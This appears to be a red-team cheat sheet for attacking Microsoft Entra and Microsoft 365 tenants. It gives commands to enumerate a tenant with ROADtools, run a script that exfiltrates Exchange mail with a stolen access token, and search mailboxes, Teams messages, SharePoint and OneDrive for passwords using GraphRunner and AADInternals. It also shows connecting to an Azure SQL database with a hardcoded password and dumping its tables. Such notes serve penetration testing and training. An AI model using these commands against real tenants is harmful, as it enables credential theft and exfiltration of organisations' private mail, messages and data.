General Recon
Gather info about Entra with ROADTools https://github.com/dirkjanm/ROADtools
roadrecon gatherDetermine if tenant is using teams, outlook, sharepoint.
Get-MgUserLicenseDetail -UserId "user.one@domain.com"If “O365_BUSINESS_ESSENTIALS” then YES!
Stealing exchange email https://github.com/rootsecdev/Azure-Red-Team/blob/master/Tokens/exfil_exchange_mail.py Add access token to script and run.
python3 exfil_exchange_mail.pyGraphRunner https://github.com/dafthack/GraphRunner/
Invoke-SearchMailbox -Tokens $tokens -SearchTerm "password" -MessageCount 40MSTeams
Stealing teams messages https://github.com/Gerenios/AADInternals
Import-Module ./AADInternals.psm1
Get-AADIntTeamsMessages -AccessToken $MSTeamsToken.access_token | fl id,content,deletiontime,*type*,DisplayNameGraphRunner https://github.com/dafthack/GraphRunner/
Invoke-SearchTeams -Tokens $tokens -SearchTerm passwordSharePoint & OneDrive
Searching for creds GraphRunner https://github.com/dafthack/GraphRunner/
Get-GraphTokens
Invoke-SearchSharePointAndOneDrive -Tokens $tokens -SearchTerm passwordGraphrunner will ask if you’d like to download the files it finds.
SQL
Connect
$conn = New-Object System.Data.SqlClient.SqlConnection
$password='$reporting$123'
$conn.ConnectionString = "Server=mbt-finance.database.windows.net;Database=Finance;User ID=financereports;Password=$password;"
$conn.Open()Enum
$sqlcmd = $conn.CreateCommand()
$sqlcmd.Connection = $conn
$query = "SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE';"
$sqlcmd.CommandText = $query
$adp = New-Object System.Data.SqlClient.SqlDataAdapter $sqlcmd
$data = New-Object System.Data.DataSet
$adp.Fill($data) | Out-Null
$data.TablesQuery
$sqlcmd = $conn.CreateCommand()
$sqlcmd.Connection = $conn
$query = "SELECT * FROM Subscribers;"
$sqlcmd.CommandText = $query
$adp = New-Object System.Data.SqlClient.SqlDataAdapter $sqlcmd
$data = New-Object System.Data.DataSet
$adp.Fill($data) | Out-Null
$data.Tables | ft